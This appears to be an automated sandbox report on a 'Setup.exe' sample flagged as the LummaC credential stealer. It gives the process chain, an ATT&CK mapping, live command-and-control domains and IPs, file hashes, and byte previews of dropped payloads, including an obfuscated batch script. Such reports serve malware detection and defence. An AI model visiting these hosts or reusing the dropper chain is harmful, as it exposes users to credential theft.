      Source: Hc.com.2.dr Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
      Source: Hc.com Binary or memory string: WIN_XPe
      Source: Hc.com Binary or memory string: WIN_VISTA
      Source: Hc.com Binary or memory string: WIN_7
      Source: Hc.com Binary or memory string: WIN_8

Remote Access Functionality

Source: Yara match; File source: sslproxydump.pcap, type: PCAP
Source: Yara match; File source: decrypted.memstr, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com; Code function: 12_2_006A2263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,12_2_006A2263
Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com; Code function: 12_2_006A1C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,12_2_006A1C61

MITRE ATT&CK matrix, listed by tactic (the number in parentheses is the signature count shown in the matrix for that technique; techniques without a number had no matching signature):

Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies, Network Topology
Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless, Malvertising
Initial Access: Valid Accounts (2), Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application
Execution: Windows Management Instrumentation (1), Native API (1), PowerShell (1), Cron, Launchd, Scheduled Task, Systemd Timers, Container Orchestration Job, Command and Scripting Interpreter
Persistence: DLL Side-Loading (1), Valid Accounts (2), Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job, At
Privilege Escalation: Exploitation for Privilege Escalation (1), DLL Side-Loading (1), Valid Accounts (2), Access Token Manipulation (21), Process Injection (12), RC Scripts, Startup Items, Scheduled Task/Job, At
Defense Evasion: Disable or Modify Tools (1), Deobfuscate/Decode Files or Information (11), Obfuscated Files or Information (2), DLL Side-Loading (1), Masquerading (11), Valid Accounts (2), Virtualization/Sandbox Evasion (1), Access Token Manipulation (21), Process Injection (12)
Credential Access: Input Capture (21), LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem, /etc/passwd and /etc/shadow
Discovery: System Time Discovery (2), Account Discovery (1), File and Directory Discovery (3), System Information Discovery (17), Security Software Discovery (21), Virtualization/Sandbox Evasion (1), Process Discovery (4), Application Window Discovery (1), System Owner/User Discovery (1)
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services, Direct Cloud VM Connections
Collection: Archive Collected Data (1), Input Capture (21), Clipboard Data (3), Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking, Data Staged
Command and Control: Ingress Tool Transfer (1), Encrypted Channel (11), Non-Application Layer Protocol (2), Application Layer Protocol (113), Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol, Web Protocols
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: System Shutdown/Reboot (1), Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement, Internal Defacement
Behavior Graph (ID: 1580131, Sample: Setup.exe, Start date: 24/12/2024, Architecture: WINDOWS, Score: 88)

• Setup.exe started; signatures on the sample: Suricata IDS alerts for network traffic, Found malware configuration, Yara detected LummaC Stealer, 3 other signatures
• Setup.exe started cmd.exe
• cmd.exe dropped C:\Users\user\AppData\Local\Temp\...\Hc.com (PE32); signature: Drops PE files with a suspicious file extension
• cmd.exe started Hc.com, extrac32.exe, cmd.exe and 8 other processes
• Hc.com connected to hungrypaster.click (188.114.96.6, 443, 49731, 49737; CLOUDFLARENETUS, European Union); signature: LummaC encrypted strings found
• extrac32.exe dropped C:\Users\user\AppData\Local\Temp\Adaptor (DOS)
• DNS/IP info: hungrypaster.click, PvXlInYKrSNwyXWSA.PvXlInYKrSNwyXWSA

Source | Detection | Scanner
Setup.exe | 0% | ReversingLabs
Setup.exe | 6% | Virustotal

Source | Detection | Scanner
C:\Users\user\AppData\Local\Temp\280366\Hc.com | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\Adaptor | 0% | ReversingLabs

No Antivirus matches

No Antivirus matches

Source | Detection | Scanner | Label
https://hungrypaster.click:443/api0r101r102r115r118r101r120r115r118r125r51r73r118r116r51r84r105r114r | 0% | Avira URL Cloud | safe
https://hungrypaster.click/apiX | 0% | Avira URL Cloud | safe
https://hungrypaster.click/ | 0% | Avira URL Cloud | safe
https://hungrypaster.click:443/api | 0% | Avira URL Cloud | safe
https://hungrypaster.click/zj | 0% | Avira URL Cloud | safe
hungrypaster.click | 0% | Avira URL Cloud | safe
https://hungrypaster.click/api | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
hungrypaster.click | 188.114.96.6 | true | true | - | unknown
PvXlInYKrSNwyXWSA.PvXlInYKrSNwyXWSA | unknown | unknown | false | - | unknown
Name | Malicious | Antivirus Detection | Reputation
wordyfindy.lat | false | - | high
slipperyloo.lat | false | - | high
curverpluch.lat | false | - | high
tentabatte.lat | false | - | high
hungrypaster.click | true | Avira URL Cloud: safe | unknown
manyrestro.lat | false | - | high
bashfulacid.lat | false | - | high
shapestickyr.lat | false | - | high
https://hungrypaster.click/api | true | Avira URL Cloud: safe | unknown
talkynicer.lat | false | - | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0 | Setup.exe | false | - | high
https://hungrypaster.click/zj | Hc.com, 0000000C.00000002.2353015147.0000000003EF0000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://hungrypaster.click/ | Hc.com, 0000000C.00000002.2353015147.0000000003EF0000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000C.00000002.2352426923.00000000018D7000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://hungrypaster.click:443/api | Hc.com, 0000000C.00000002.2352128877.00000000016D7000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.ssl.com/repository0 | Setup.exe | false | - | high
http://ocsps.ssl.com0 | Setup.exe | false | - | high
http://www.autoitscript.com/autoit3/X | Hc.com, 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp, Hc.com, 0000000C.00000003.2310520132.0000000004413000.00000004.00000800.00020000.00000000.sdmp, Developers.9.dr, Hc.com.2.dr | false | - | high
http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0 | Setup.exe | false | - | high
http://nsis.sf.net/NSIS_ErrorError | Setup.exe | false | - | high
http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0_ | Setup.exe | false | - | high
https://www.autoitscript.com/autoit3/ | Hc.com, 0000000C.00000003.2310520132.0000000004413000.00000004.00000800.00020000.00000000.sdmp, Hc.com.2.dr, Fw.9.dr | false | - | high
http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0 | Setup.exe | false | - | high
https://hungrypaster.click:443/api0r101r102r115r118r101r120r115r118r125r51r73r118r116r51r84r105r114r | Hc.com, 0000000C.00000002.2352128877.00000000016D7000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://hungrypaster.click/apiX | Hc.com, 0000000C.00000002.2352426923.0000000001901000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
188.114.96.6 | hungrypaster.click | European Union | 13335 | CLOUDFLARENETUS | true
                                            Joe Sandbox version:41.0.0 Charoite
                                            Analysis ID:1580131
                                            Start date and time:2024-12-24 01:25:16 +01:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 6m 18s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:16
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:Setup.exe
                                            Detection:MAL
                                            Classification:mal88.troj.evad.winEXE@24/24@2/1
                                            EGA Information:
                                            • Successful, ratio: 100%
                                            HCA Information:
                                            • Successful, ratio: 98%
                                            • Number of executed functions: 77
                                            • Number of non-executed functions: 302
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe
                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                            • Excluded IPs from analysis (whitelisted): 13.107.246.43, 4.245.163.56
                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            • Report size getting too big, too many NtSetInformationFile calls found.
Time | Type | Description
19:26:12 | API Interceptor | 1x Sleep call for process: Setup.exe modified
19:26:16 | API Interceptor | 2x Sleep call for process: Hc.com modified
Match: 188.114.96.6
Associated Sample Name / URL | Detection | Threat Name | Context
236236236.elf | malicious | Unknown | hollweghospitality.com/blog/wp-login.php
BanK_copy.rtf | malicious | Unknown | 244-3-drvu.4everland.app/bankcopy.exe
Purchase Order..exe | malicious | FormBook | www.bser101pp.buzz/v89f/
ibk0BQaWAo.exe | malicious | Unknown | orbitdownloader.com/
ibk0BQaWAo.exe | malicious | Unknown | orbitdownloader.com/
e6o7hKFmfC.exe | malicious | FormBook | www.astrofrance.online/uem3/?BpE=hw9wdlgRPJgu6mhEw3v3abu2JdZhLnzfTKsoEzFZGCpKAu6wx+OREaAyoHMqAY/6AEPW&SH=IDKTKDM
Match: hungrypaster.click
Associated Sample Name / URL | Detection | Threat Name | Context
AutoUpdate.exe | malicious | LummaC | 104.21.93.82
Match: CLOUDFLARENETUS
Associated Sample Name / URL | Detection | Threat Name | Context
Setup.exe | malicious | LummaC | 188.114.96.6
'Set-up.exe | malicious | LummaC | 172.67.169.205
setup.exe | malicious | LummaC | 172.67.191.144
Setup.exe | malicious | LummaC | 104.21.27.229
installer.msi | malicious | Unknown | 104.21.80.93
Setup.exe | malicious | LummaC | 104.21.58.45
AutoUpdate.exe | malicious | LummaC | 172.67.169.205
EPIRTURMEROOO0060.exe | malicious | MassLogger RAT | 172.67.177.134
https://en.newsnowbangla.com/archives/69912 | malicious | HTMLPhisher, TechSupportScam | 104.17.25.14
https://u48917305.ct.sendgrid.net/ls/click?upn=u001.ztQPJiWtq2gO8V-2Ftd7SxY9UCAq3VScTPSloeIw5UEMPd6e3nbPRvJ98moPTqmrdQ1eNbvwZHJ-2BEb4HrooVFNCTltmXW6SgRONKSmPzdFoWfDQT97cczFZ0vj7M2xBd2izDTi-2BL-2BoVqB8yVzV2GW7vOPvy3s9yVghrOS5vs-2BSnWyzJMkXQxVEReq4oLCDet7QAOvo_JkpSD-2Bg6VoLAQppUKMb-2BxDh4v4nbOeQFT31aoN-2FLkhvFCzY6wdlGM7RTNIi47OKR1tTaghG8tTKssArDNPSXAfX9wO6nsZ2FHn-2FunyaOti-2FaII-2FnbKYDXJOImW-2Bs9f4tYnWj8rqO7L0kp4KNRHBDo0iHoL8DEOGc8GMtzqzsIqERel6-2FxJyY4DBnsnUTOc2I4HCPKA6lxcCEXMtxEA1-2FnQ-3D-3D | malicious | HTMLPhisher | 104.17.25.14
Match: a0e9f5d64349fb13191bc781f81f42e1
Associated Sample Name / URL | Detection | Threat Name | Context
Setup.exe | malicious | LummaC | 188.114.96.6
'Set-up.exe | malicious | LummaC | 188.114.96.6
setup.exe | malicious | LummaC | 188.114.96.6
Setup.exe | malicious | LummaC | 188.114.96.6
Setup.exe | malicious | LummaC | 188.114.96.6
AutoUpdate.exe | malicious | LummaC | 188.114.96.6
Violated Heroine_91zbZ-1.exe | malicious | Unknown | 188.114.96.6
xlSzrIs5h6.exe | malicious | LummaC, Stealc | 188.114.96.6
ZysXVT72cl.exe | malicious | LummaC | 188.114.96.6
NxqDwaYpbp.exe | malicious | LummaC | 188.114.96.6
Match: C:\Users\user\AppData\Local\Temp\280366\Hc.com
Associated Sample Name / URL | Detection | Threat Name
fkawMJ7FH8.exe | malicious | LummaC, Amadey, LummaC Stealer, RedLine, Stealc
ChoForgot.exe | malicious | Vidar
94e.exe | malicious | Remcos
94e.exe | malicious | Remcos
0442.pdf.exe | malicious | Remcos
acronis recovery expert deluxe 1.0.0.132.rarl.exe | malicious | LummaC
trZG6pItZj.exe | malicious | Vidar
9EI7wrGs4K.exe | malicious | Vidar
Wine.exe | malicious | LummaC
Setup.exe | malicious | LummaC
                                                                Process:C:\Windows\SysWOW64\cmd.exe
                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Category:modified
                                                                Size (bytes):947288
                                                                Entropy (8bit):6.630612696399572
                                                                Encrypted:false
                                                                SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                                                MD5:62D09F076E6E0240548C2F837536A46A
                                                                SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                                                SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                                                SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Joe Sandbox View:
                                                                • Filename: fkawMJ7FH8.exe, Detection: malicious, Browse
                                                                • Filename: ChoForgot.exe, Detection: malicious, Browse
                                                                • Filename: 94e.exe, Detection: malicious, Browse
                                                                • Filename: 94e.exe, Detection: malicious, Browse
                                                                • Filename: 0442.pdf.exe, Detection: malicious, Browse
                                                                • Filename: acronis recovery expert deluxe 1.0.0.132.rarl.exe, Detection: malicious, Browse
                                                                • Filename: trZG6pItZj.exe, Detection: malicious, Browse
                                                                • Filename: 9EI7wrGs4K.exe, Detection: malicious, Browse
                                                                • Filename: Wine.exe, Detection: malicious, Browse
                                                                • Filename: Setup.exe, Detection: malicious, Browse
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\SysWOW64\cmd.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):466124
                                                                Entropy (8bit):7.999604773482189
                                                                Encrypted:true
                                                                SSDEEP:12288:yEBA5qYZFNNFg5y6qh8DLJv836EzIqP6Ft+t2k1epDSp:xA5qcNDg5yh8PtW6FVFt+pgC
                                                                MD5:3224476071285CA2C85876002120182B
                                                                SHA1:F6EC731B44C016BC642EAA5B8AFF12D798417500
                                                                SHA-256:523A25C70126A9947C491587282827B07352DAFBDE21197727E7B22787F51E8E
                                                                SHA-512:DE960E7097CBC92D9C175B646206D96C722F9104B30FB333128F48EDCFA4B2D474C1F1632F15031EAEEFFF61FF5480B40F4C0E53804835FA8D7538BDFA09AD16
                                                                Malicious:false
                                                                Preview:nj.*~m^$..~hF.8v..S.._..(%....=....I......vS.x.G .........Xd....l...e.NJ4.81...{u.9.5..k......:.E2.bY.Y.&.yQB.E..|.[s>...(.e.`...q{I...3.J..R?.... ..0....0........'....t.(..7o...ye<At....-.<...n.......d..1FU.c...L..af..G..../.{."...H/:....h..'.|.#B....v....z......T.....o....E)...#Y`s..y..].].*..._.....e....ab0.+..;`c5).......rS...7U9.O.......l....O..UW.].)Rk ..2....Q..QD.3A.zx.I..y.....%......aM..M.cd.6$R.6......c..t2..(MDLT-i........nR.w...cI..c....'...=.o........".O.......C.h"..E.x.`...s4C.5)..s..M......%=iW...^.f.F..X>f.Z.U.8.yk.(bt.NW.....&...g..3..&>.LgL...M.Y5a....O.4.;.....+...I;6d..E.4.<....T...V.....r...9..&..................j..3tU..A..5.......l........i-M..:..W.u.MF.Kd.1a..../Z{+.....&.\.nj.{..6y..<.2....s/Y.Y.#.;...W...Ty.D%s:..x.>....u........G.x.^....1.H......Y..R..!}l..?c=J0,pD0.....=,..e+50.......G.....X..N.G!i.......526.HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.
                                                                Process:C:\Windows\SysWOW64\extrac32.exe
                                                                File Type:DOS executable (COM)
                                                                Category:dropped
                                                                Size (bytes):52224
                                                                Entropy (8bit):6.616637261148489
                                                                Encrypted:false
                                                                SSDEEP:768:WY6rbybcdAqM4w85qviR93X0Z1IrvD19c1pQLiype/ehju5rWiq/DOSOlwRDNFo1:WY464qvI932eOypvcLSDOSpZ+Sh+IU
                                                                MD5:73240421468DABA3E1CACD56A08D2CF9
                                                                SHA1:D22B0E5DA0EE5CE4F19B41228016DB890A3F0CD4
                                                                SHA-256:5AE5202682B0F5F6C87E9E28858E1E9BE2F7032582BF28BD720517BA0D7E4FBB
                                                                SHA-512:140100D41B41DDD1574114A264BF4858BC408E0C79D24AA1001BCB9F86B392A35B1773215B9E6CC6665F37D16F866E8A996C470A2611EB7D5C969BC301C3242C
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:....3.8E....H%.......;...5....E.H...M.....E.M...........E...@.......H.3.3.@.u...M..E....E......U.E.3.3.@.u..#..E..#...u..]..E.M.#.#.....u...M.8].t..E..U.#.#....t....E...u...t5.i.....t.=....t.=....u..]...8]......8].t.8].u.8].t....M....."u.................t).M...!..;...]...w.;...S....].+].+].K.G....u..u......YYj......M................U..@r..........3..J.@3..t...M.E....E.....U..E.3.3.@.bt..#..E..#...u..]..E.M.#.#.....u...M.8].t..E.U.#.#....t....E...u...t5.B.....t.=....t.=....u..]...8]......8].t.8].u.8].t....M.....s.............M..%..;.r@w.;.v:.M.3..].......C8A....H%.......;.~.Q....~..M....s......]..M..n ..#.#.E...x..t..Y...PVWS.u........k...PVWS.u..[......_^[..]..U....3.S.].VW.}.8S....J........@w9.M..9.v..q...3..9.v..I...3.}..S......P.u.3...R...QP.!............E.w...uQ.......U.....}..D...E....}...U....U...t.....?......."...u..E.U.S.u..u.Q.u..3.u..e.....E.C.U..]..e..M.j@Y+.E..M....T......U.3..@r...M.E.E..U.3.D...}.#..$r...E..M....U.3
Process: C:\Users\user\Desktop\Setup.exe
File Type: Microsoft Cabinet archive data, 489682 bytes, 12 files, at 0x2c +A "Cash" +A "Jury", ID 6845, number 1, 29 datablocks, 0x1 compression
Category: dropped
Size (bytes): 489682
Entropy (8bit): 7.998526384976645
Encrypted: true
SSDEEP: 12288:wpgLBZWuuPSjx8pv6yufclVtaCbOhYtzYjX9cbgeZ0X:cgkPSV8pyHWEytUjNcbgtX
MD5: 3B891BAB1F59CA7A8F70A02506C5BE5E
SHA1: 4FE8FD4136129A410F8A97B0415D7BCA29EF77E9
SHA-256: E95567B78827D3B731C7BD183741E044EE91A81FB58907CD5257B0F4668C0660
SHA-512: 0831DCED5A288153166C4A0314B7B24C408336DE9BF741BCCB711D1A71996951DD395E5B91EB3FDB1423C3CA94DB28EEAE3DD486FDCEF40983E4231DAB3B06B5
Malicious: false
Process: C:\Users\user\Desktop\Setup.exe
File Type: OpenPGP Public Key
Category: dropped
Size (bytes): 62464
Entropy (8bit): 7.997103321874569
Encrypted: true
SSDEEP: 1536:A0cvC95Od7r1Muwg//k0reABy6Bz8ejwS8s:A0z95OdPkg//kIrBy6B8eP8s
MD5: CE133FEEA90EBC7648B2A1826CDF76A2
SHA1: 31BD289BDB6F118507B41B8E69AAECF4A1163773
SHA-256: E1819706091BFBF96DBB9BC5DB4F66CFD0A56BEF7F0B6438531C3D9C4ADC3119
SHA-512: E4BF39FBAD9A5902D2F024E35B8ABDD4CC6714ACE244A594BEE41465436FB2B8B22C1FAF7375BE7DC986BEA22AC4A77B78652EF7D4F633B0DB98B6E3D521BF92
Malicious: false
Process: C:\Windows\SysWOW64\extrac32.exe
File Type: data
Category: dropped
Size (bytes): 149504
Entropy (8bit): 6.695940442997366
Encrypted: false
SSDEEP: 3072:/lHS3NxrHSBRtNPnj0nEoXnmowS2u5hVOoQ7t8T6pUkBJR8CThpmESb:NHS3zcNPj0nEo3tb2j6AUkB0CThp6b
MD5: AED1C869CC9610344E24FBD8050AC4D4
SHA1: A23CE35D2CB399F75B091959A4E449F655EBE142
SHA-256: 91906E3A443DF990F4FA6693887DB5017A03E7487997B2CC95EE21757E8E9CB1
SHA-512: 7F2721FAC7B773C9BC51DAAB0D2209E4E53C04DC42A4058D214A78E03572E7CBB3700A6D01CEFF20859CDE06252454F1F8729B7940F5314204029E182E472237
Malicious: false
Process: C:\Users\user\Desktop\Setup.exe
File Type: data
Category: dropped
Size (bytes): 86016
Entropy (8bit): 7.997914543444093
Encrypted: true
SSDEEP: 1536:grfjVQJTaqw1U6D6ZJoYliEvfstVc5/88wb0320DNStFeRBkj:Gj+Lw1X6ZqY/vfstVu/Ipe2
MD5: 2A80ED063A2EC6F7FBDBAA0C8806BEE5
SHA1: 7235E6A68488D9583FFB7BFEFD146FD4B47E074E
SHA-256: EF6F02A7FBA84C6FD4C7F3AA77141B4EBE36D7A0B89AA89B82E3689D3C4342D7
SHA-512: F3D245B534ACC86C0F13CF8C8A88AAA45CCD72EB959A9B710690F3F851327DF10A1F4045618886F10D8014BDF4B7E03EA5788A3F29EA237A35BDCE49AEE1F862
Malicious: false
Process: C:\Users\user\Desktop\Setup.exe
File Type: ASCII text, with very long lines (980), with CRLF line terminators
Category: dropped
Size (bytes): 21933
Entropy (8bit): 5.098733008811691
Encrypted: false
SSDEEP: 384:hXaKFDtP0hMjSwgunj4RBQtvcy7KxRVIjGBnV2gR9XnNNCUZ0n+RL1ddXJtNiLYi:hXaUchMGKnyBQVBujIG9AgJjFHb+
MD5: B72A397CD97E0F26EA645687E0E27B12
SHA1: 8BA44F76D5CDD59429FAE20D9386E1F62785AFBA
SHA-256: 5D3E41E290DC98B449E186D0A3E9EC9E02863DE087EC95B3684C399C7D4DB280
SHA-512: 938FD796A5F4109B2678CE8B7AB93330317A71AA1E69CF81DE1C759A659D8B0E080B94BFA2F9FEA24224E19DDC53C3C1BB3F7CCD9ED8C5323638BD29E1EDC074
Malicious: false
Preview: Set Accessed=a..jDSDDaughters-Sc-Equipped-Stewart-..rXRestoration-Counties-Secured-Lucia-..iFTeddy-..lESuccessfully-Jordan-Justin-Clouds-..xYwSt-Moscow-Ou-..TdDiversity-Bookstore-Aid-Reasoning-Broadway-Consequences-Commissioners-..Set Momentum=2..XItBike-Subsidiaries-..KgcXAccessory-Scored-Message-Nuke-Guess-Figure-Necessarily-..NLlMight-Untitled-Mail-Programs-Charles-Tea-Myself-..rZActually-..DUeKYouth-Ieee-..vrAaInternationally-Temporal-Enjoy-Tiny-..kndFExpiration-Broadcasting-..xQSAcre-Recordings-Maternity-Switched-Soldiers-Injuries-Meets-..Set Doing=Z..wWCome-Strip-To-Clay-Rank-Mood-Licking-Dress-..jwQRequires-Genius-Studying-..ZZMATax-Solely-James-Putting-Hear-Irrigation-Strain-Collectible-..jDZones-Verizon-Costa-Valuable-Midlands-Calculations-..YDTechnical-Prophet-Involve-Recovered-Surveillance-Euro-Pix-..wlFears-Weekly-Barbados-..qoevCoin-Screensavers-Detailed-..NvHZSurveys-Keith-Louis-Disturbed-..Set Customize=I..FqFpCeremony-Brands-Conservative-Municipal-Ace-..tDUDuties-Papua-
Process: C:\Windows\SysWOW64\cmd.exe
File Type: ASCII text, with very long lines (980), with CRLF line terminators
Category: dropped
Size (bytes): 21933
Entropy (8bit): 5.098733008811691
Encrypted: false
SSDEEP: 384:hXaKFDtP0hMjSwgunj4RBQtvcy7KxRVIjGBnV2gR9XnNNCUZ0n+RL1ddXJtNiLYi:hXaUchMGKnyBQVBujIG9AgJjFHb+
MD5: B72A397CD97E0F26EA645687E0E27B12
SHA1: 8BA44F76D5CDD59429FAE20D9386E1F62785AFBA
SHA-256: 5D3E41E290DC98B449E186D0A3E9EC9E02863DE087EC95B3684C399C7D4DB280
SHA-512: 938FD796A5F4109B2678CE8B7AB93330317A71AA1E69CF81DE1C759A659D8B0E080B94BFA2F9FEA24224E19DDC53C3C1BB3F7CCD9ED8C5323638BD29E1EDC074
Malicious: false
Preview: Set Accessed=a..jDSDDaughters-Sc-Equipped-Stewart-..rXRestoration-Counties-Secured-Lucia-..iFTeddy-..lESuccessfully-Jordan-Justin-Clouds-..xYwSt-Moscow-Ou-..TdDiversity-Bookstore-Aid-Reasoning-Broadway-Consequences-Commissioners-..Set Momentum=2..XItBike-Subsidiaries-..KgcXAccessory-Scored-Message-Nuke-Guess-Figure-Necessarily-..NLlMight-Untitled-Mail-Programs-Charles-Tea-Myself-..rZActually-..DUeKYouth-Ieee-..vrAaInternationally-Temporal-Enjoy-Tiny-..kndFExpiration-Broadcasting-..xQSAcre-Recordings-Maternity-Switched-Soldiers-Injuries-Meets-..Set Doing=Z..wWCome-Strip-To-Clay-Rank-Mood-Licking-Dress-..jwQRequires-Genius-Studying-..ZZMATax-Solely-James-Putting-Hear-Irrigation-Strain-Collectible-..jDZones-Verizon-Costa-Valuable-Midlands-Calculations-..YDTechnical-Prophet-Involve-Recovered-Surveillance-Euro-Pix-..wlFears-Weekly-Barbados-..qoevCoin-Screensavers-Detailed-..NvHZSurveys-Keith-Louis-Disturbed-..Set Customize=I..FqFpCeremony-Brands-Conservative-Municipal-Ace-..tDUDuties-Papua-
Process: C:\Windows\SysWOW64\extrac32.exe
File Type: data
Category: dropped
Size (bytes): 115712
Entropy (8bit): 6.395119066715225
Encrypted: false
SSDEEP: 3072:0kjGWoUlJUPdgQa8Bp/LxyA3laW2UDQWf05mjccBiqXvpgh:0kjGgQaE/loUDtf0accB30
MD5: C4852541FFA550317E284995D601BE19
SHA1: 295EE4490A566D441DEAB2DBBB7917E36C154984
SHA-256: D31EEED38AC69015A7ACB915312B6FAEF3534641C61926F9CD4E5471C8921501
SHA-512: 4EF2060810F8A9886CFCACAC246CBFC5408B46C3E07460B7D27271F52E09ABFFB1304A00B57C85F17F3C1B980E8944272CE2AD0B7902B23949C8D68CBE94B8EB
Malicious: false
Process: C:\Windows\SysWOW64\extrac32.exe
File Type: data
Category: dropped
Size (bytes): 119808
